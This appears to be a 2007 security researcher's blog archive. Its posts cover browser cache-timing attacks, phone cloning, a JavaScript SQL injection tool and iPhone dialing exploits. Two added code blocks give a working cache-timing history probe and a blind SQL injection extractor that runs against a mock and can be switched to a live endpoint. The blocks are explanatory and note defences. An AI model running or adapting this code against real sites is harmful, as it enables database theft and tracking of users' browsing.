Current Topic: Technology

Topic: Technology
6:58 pm EDT, Aug 15, 2007
Jill out of town for work... Check
1.75L Grey Goose... Check
12 Pack Dr. Pepper... Check
Visual Studio 2005 Team Edition... Check
ECMAScript Standard 3rd Edition... Check
Rhino Book... Check
Purple Book... Check
Working from home tomorrow... Check
Nidhi's super secret static analysis code... Check

Can I write a recursive descent JavaScript parser before tomorrow afternoon? Let's find out.

Timing attacks on web privacy

Topic: Technology
9:06 pm EDT, Aug 10, 2007
Ed Felten is a genius. In this paper he discusses using timing between HTTP requests to determine whether certain URLs have been cached on a user's machine. He extends this to detecting secondary cache hits to determine whether two arbitrary machines are on the same network subnet. He discusses doing this both with and without JavaScript. Yes, essentially, Ed Felten published Grossman's and RSnake's Black Hat presentation 7 years before they did. Long ago RSnake claimed I stole his research and suggested I edit my paper to reflect that someone else had done work in this area. It will be interesting to see whether RSnake is willing to do that when confronted with the same situation. What's the phrase? Put up or shut up? Of course, I've never seen Grossman or RSnake reference Ed Felten's work in any of their presentations. Was it willfully omitted? If not, how could they not be aware of it if they did any type of due diligence for their research? It's not like Edward Felten is some obscure person in the security space. Some of his work was required reading in a class I took as a sophomore in college.

Update: Ahh, the drama...
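
The core of the measurement Felten and Schneider describe, as an added example written for this page (it is not code from the paper or from any of the presentations mentioned above): time the first load of a target resource, then calibrate against the now-warm copy of it and against a cache-busted copy of the same URL, and decide which baseline the first load resembled. The Image-based transport, the 2x separation rule and the `?nocache=` cache-buster are assumptions of this example, not something the paper prescribes.

```javascript
// Cache-timing probe in the style of Felten & Schneider (2000), written for
// this page as an illustration. A page cannot read whether a cross-site
// resource is cached, but it can time how long the browser takes to produce
// it: a cache hit completes in about the cost of a few function calls, a miss
// costs at least one network round trip.
// Assumption: timing via an Image element; any element that fires onload
// after the fetch would do.

const now = () =>
  (typeof performance !== "undefined" ? performance.now() : Date.now());

// Time one load of `url` via an Image element (browser only). onerror also
// resolves: a 404 served from cache is still a fast 404. Every call warms the
// cache for that URL, so the order of measurements matters.
function timeImageLoad(url) {
  return new Promise((resolve) => {
    const img = new Image();
    const start = now();
    img.onload = img.onerror = () => resolve(now() - start);
    img.src = url;
  });
}

function median(values) {
  const sorted = [...values].sort((a, b) => a - b);
  const mid = Math.floor(sorted.length / 2);
  return sorted.length % 2 ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2;
}

// Decide whether the FIRST load of the target resembled the "known cached"
// baseline or the "known uncached" baseline. If the baselines are not clearly
// separated (less than a 2x gap; an assumed rule of thumb) the measurement is
// unreliable and we refuse to guess rather than report noise as a result.
function classify(firstLoadMs, cachedMs, uncachedMs) {
  if (!(uncachedMs >= 2 * cachedMs)) return "inconclusive";
  const threshold = (cachedMs + uncachedMs) / 2;
  return firstLoadMs <= threshold ? "cached" : "uncached";
}

// Full probe (browser only): one untainted sample of the target, then the
// cached baseline from the now-warm target and the uncached baseline from a
// cache-busted variant of the same URL (unique query string each time).
async function probeCached(url, samples = 3) {
  const first = await timeImageLoad(url); // the only honest sample
  const cached = [];
  for (let i = 0; i < samples; i++) cached.push(await timeImageLoad(url));
  const uncached = [];
  for (let i = 0; i < samples; i++) {
    const sep = url.includes("?") ? "&" : "?";
    uncached.push(await timeImageLoad(url + sep + "nocache=" + Math.random()));
  }
  return {
    firstLoadMs: first,
    verdict: classify(first, median(cached), median(uncached)),
  };
}
```

Only the first load of the target is an honest sample; every later load of the same URL is a hit, which is why the baselines are taken afterwards. The same classifier serves the subnet variant the post mentions: a fast first load of a resource this browser has never requested points to a shared intermediate cache (a proxy) between the two machines. Current browsers partition the HTTP cache by top-level site, which blunts the cross-site form of this probe but not the shared-proxy form.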

Cloning western technology, and getting a better result!

Topic: Technology
10:12 am EDT, Aug 10, 2007
How to Clone Anything

The easiest way to clone a product is to use a "ghost shift": A factory contracted to make legitimate goods moves to 24-hour operation, churning out copies—some made with inferior materials, and others exactly the same, designed to be sold on the black market—from midnight to morning. The only problem with ghost shifts is that they can't run full time. In the mid-'90s, developers began building factories constructed from the same blueprints legitimate manufacturers used to launch their ventures. Sometimes the plans were sold by managers at the genuine facilities. Other times, local officials and organized crime conspired to create a second set of blueprints.

Cloners look for opportunity first, and manufacturers often give it to them, often in the form of a hot product that is released in a limited number of markets. Desire spreads worldwide, and the cloners are ready to fill any gaps that emerge in supply or distribution. (That's what's happening now with the iPhone, which for nearly a year will be sold in North America only.)

The cloners start by deciding what phones would be most profitable to clone. They then learn everything they can about the device. They attend trade shows, furiously snapping photos of not-yet-released products until someone notices and shoos them away. They will be first in line to buy the new product whenever it hits stores. And they will look for shortcuts, such as a patent filed in China that can act as the beginning of an actual production guide.

The cloners hire a team of between 20 and 40 engineers to begin decoding the circuit boards. At the same time, coders start to develop an operating system for the phone with a similar feature set. (The typical cloner either uses off-the-shelf code, writes something entirely new, or modifies a publicly available Linux-based system.) Both processes take about a month. By then, ancillary items—plastic casings, accessories, manuals and packaging—are ready as well.

Full production begins at another factory, one that is already building phones, within about eight weeks from the time the engineers are hired. After a run of about 30,000 units, the cloners move the operation to a new facility in order to avoid detection.

This is a fascinating read!

Securing Ajax Applications

Topic: Technology
9:21 am EDT, Aug 7, 2007
There is a reason this book's animal is a laughing hyena. Unfortunately, the joke's on you.

Topic: Technology
4:08 am EDT, Aug 2, 2007
This is the end
Beautiful friend
This is the end
My only friend, the end
Of our elaborate plans, the end
Of everything that stands, the end
No safety or surprise, the end

We gave it a great send-off over the last few days. Many drinks. Many toasts. To those who aren't here, but who got us here. To those that did without to build something great. But all good things come to an end. And now it's gone.

Remember Mantra #2: Make it work. Then make it great. Then take it live. Then change the world. Then make your money. Then make it free. Then start again.

DOMinatrix - The JavaScript SQL Injector

Topic: Technology
2:05 am EDT, Jul 26, 2007
DOMinatrix is, well, incredibly awesome. It's a fully automated SQL Injection tool written in JavaScript, which will dump out data from MS SQL Server databases (more to come). I'll be demoing DOMinatrix at my Black Hat presentation. XSS + Web worm + DOMinatrix = oh crap. In the last 5 months we've seen the development of web scanners and SQL injectors in JavaScript. These aren't browser exploits. These aren't buffer overflows. These aren't something that affects only a single browser and only on pages that don't explicitly set a character set. This is using JavaScript in perfectly valid ways to do extremely malicious things. There is no way to patch this. End users are pretty much screwed. Here is a screen shot of DOMinatrix in action.
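
How a tool of this kind pulls a value out of the database, as an added example written for this page (it is not DOMinatrix code): a script running in the vulnerable site's origin asks the server yes/no questions of the form ASCII(SUBSTRING(result, i, 1)) > n and recovers each character by binary search from whether the page came back looking like the normal one. The /product?id= endpoint, its concatenated WHERE clause, the sysobjects sub-query used as the thing to extract, and the mock that stands in for SQL Server are all constructed for the example.

```javascript
// Boolean-based blind SQL injection driven from the browser, written for this
// page to illustrate how a DOMinatrix-style tool extracts data one bit at a
// time. The target (/product?id=...) and its behaviour are a constructed mock.

// Payload shape for Microsoft SQL Server: compare one character of a
// sub-query result against a number. "--" comments out the rest of the
// application's original WHERE clause.
function buildPayload(id, subquery, pos, n) {
  return `${id}' AND ASCII(SUBSTRING((${subquery}),${pos},1))>${n}--`;
}

// Build an oracle: "does the page for this injected condition look like the
// page for the untouched id?" `fetchPage(url)` is the transport: in a browser
// the same-origin synchronous XMLHttpRequest below; in this file, the mock.
function makeOracle(fetchPage, baseUrl, id) {
  const truePage = fetchPage(baseUrl + encodeURIComponent(id));
  return (subquery, pos, n) =>
    fetchPage(baseUrl + encodeURIComponent(buildPayload(id, subquery, pos, n))) === truePage;
}

// Extract the string a sub-query returns, seven requests per character
// (binary search over 0..127). SUBSTRING past the end yields '' and
// ASCII('') is NULL, so every comparison is false and the search converges
// to 0: that is the end-of-string signal.
function extractString(oracle, subquery, maxLen = 64) {
  let out = "";
  for (let pos = 1; pos <= maxLen; pos++) {
    let lo = 0, hi = 127;
    while (lo < hi) {
      const mid = (lo + hi) >> 1;
      if (oracle(subquery, pos, mid)) lo = mid + 1; else hi = mid;
    }
    if (lo === 0) break;
    out += String.fromCharCode(lo);
  }
  return out;
}

// Browser transport (same-origin; synchronous so the loop above stays simple).
function xhrFetchPage(url) {
  const xhr = new XMLHttpRequest();
  xhr.open("GET", url, false);
  xhr.send(null);
  return xhr.responseText;
}

// ---- Constructed mock of a vulnerable endpoint so the example runs offline.
// It models:  SELECT name FROM products WHERE id='<id>'  with <id> concatenated
// in, and evaluates only the payload shape buildPayload() produces.
const MOCK_PRODUCTS = { "1": "Widget" };
const MOCK_SUBQUERY_RESULTS = {
  "SELECT TOP 1 name FROM sysobjects WHERE xtype='U'": "Users",
};
function mockFetchPage(url) {
  const id = decodeURIComponent(url.split("id=")[1]);
  const m = id.match(/^(.*)' AND ASCII\(SUBSTRING\(\((.*)\),(\d+),1\)\)>(\d+)--$/);
  let row;
  if (!m) {
    row = MOCK_PRODUCTS[id];
  } else {
    const [, baseId, subquery, pos, n] = m;
    const result = MOCK_SUBQUERY_RESULTS[subquery];
    const p = Number(pos);
    const ch = result === undefined ? "" : result.slice(p - 1, p);
    // T-SQL semantics: ASCII('') is NULL and "NULL > n" is never true.
    const cond = ch !== "" && ch.charCodeAt(0) > Number(n);
    row = cond ? MOCK_PRODUCTS[baseId] : undefined;
  }
  return row ? `<h1>${row}</h1>` : "<h1>No such product</h1>";
}

// Dump the first user table's name from the mock; swap mockFetchPage for
// xhrFetchPage to run against a real same-origin endpoint.
function demo() {
  const oracle = makeOracle(mockFetchPage, "/product?id=", "1");
  return extractString(oracle, "SELECT TOP 1 name FROM sysobjects WHERE xtype='U'");
}
```

Seven requests per character means a 64-character value costs under 500 same-origin GETs, which a page script can issue with no prompt to the user. Two things a practitioner should take from it: on the server the attack is one session making many requests whose parameter contains ASCII(SUBSTRING(, which is detectable, and the payload is inert against parameterized queries, so the fix that cannot be applied in the browser is available in the application.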

Topic: Technology
2:31 pm EDT, Jul 23, 2007
Billy, I submitted your title to the Conference Advisory Board and we were hoping you could possibly re-phrase the “Premature AJAX-ulation” references. While some of us appreciate the play on words, we have a feeling it would not be well received by all and we do not wish to offend anyone.

The SPI laboratory : SPI Labs advises avoiding iPhone feature

Topic: Technology
11:39 am EDT, Jul 17, 2007
The Apple iPhone’s Safari web browser has a special feature that allows the user to dial any phone number displayed on a web page simply by tapping the number. SPI Labs has discovered that this feature can be exploited by attackers to perform various attacks, including:

* Redirecting phone calls placed by the user to different phone numbers of the attacker’s choosing
* Tracking phone calls placed by the user
* Manipulating the phone to place a call without the user accepting the confirmation dialog
* Placing the phone into an infinite loop of attempting calls, through which the only escape is to turn off the phone
* Preventing the phone from dialing

These types of attacks can be launched from a malicious website, from a legitimate website that has Cross-Site Scripting vulnerabilities, or as part of the payload of a web application worm. For example, an attacker could determine that a specific website visitor “Bob” has called an embarrassing number such as an escort service. An attacker can also trick or force Bob into dialing any other telephone number without his consent, such as a 900-number owned by the attacker or an international number. Finally, an attacker can lock Bob’s phone, forcing Bob to either make the call or hard-reset his phone, resulting in possible data loss.

Told you it would mention an escort service.